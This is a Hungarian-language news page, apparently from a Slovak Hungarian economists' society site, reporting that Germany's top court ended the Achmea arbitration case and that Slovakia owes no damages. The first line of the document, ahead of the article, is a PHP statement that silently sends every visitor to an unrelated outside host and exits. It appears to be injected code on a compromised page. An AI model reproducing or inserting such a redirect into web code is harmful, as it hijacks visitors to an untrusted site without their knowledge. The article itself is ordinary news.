header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Szlovákia nem fizet kártérítést az Unionnak
hétfő, május 27, 2019

Keresés

Szlovákia nem fizet kártérítést az Unionnak

2805Az Union Egészségügyi Biztosító – Achmae holland társaság és Szlovákia között kialakult vitás ügy immár tíz éve húzódik, ennek végére tett pontot a Német Legfelsőbb Bíróság.

A Német Legfelsőbb Bíróság (BGH) megszüntette a Szlovákia ellen hozott végzést, amivel definitíven lezárta az egészségügyi biztosítók nyereségképzésének tilalma körül kialakult vitát, s ez egyben azt is jelenti, hogy Szlovákiának nem kell kártérítést fizetnie az Union Egészségügyi Biztosítónak.

„Várhatóan belátható időn belül Luxemburgban befejeződik a végrehajtási eljárás, miáltal felszabadulhat a zárolt 30 millió euró" – tájékoztatta az Aktuality.sk hírportált a pénzügyi tárca.

A Német Legfelsőbb Bíróságnak kötelessége volt figyelembe venni az Európai Unió Bíróságának előzetes határozatát, ezért nem volt meglepő a döntés.

Ezt követően Luxemburgban megszüntetik a végrehatási eljárást, minek köszönhetően Szlovákia hozzáférhet a mostanáig blokkolt pénzeszközeihez.

Az Achmea társaság további jogi lépései már csak a Német Legfelsőbb Bíróság ellen irányulhatnak, ami közvetlenül nem érinti Szlovákiát.

Mi a vita tárgya?

Az Achmea társaság még 2008 októberében egészségügyi biztosítók nyereségképzésének tilalma miatt beperelte Szlovákiát. 2012-ben a döntőbíróság úgy döntött, hogy Szlovákia megsértette a Hollandiával kötött beruházásvédelmi egyezményt, ezért az országot 22,1 millió euró kártérítés megfizetésére kötelezték az Achmea részére, még további 3 millió eurót kellet volna fizetni a perköltségek fedezéséért.

Az akkori döntőbíróság Frankfurtban hozta meg a döntését, ezért Szlovákia az ítélet megszüntetésének érdekében Németországban nyújtotta be a keresetét. A beadvány indoklásban az is szerepelt, hogy a beruházásvédelmi egyezményben foglaltak már érvénytelenek, mert az ország az EU tagja, s az egyezmény nincs összhangban az európai jogrenddel.
A vitás ügy a Német Legfelsőbb Bíróság elé került, amely a vita tárgyában jogi értelmezést kért az Európai Unió Bíróságától.

(Teraz.sk/Gazdaság.sk)

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia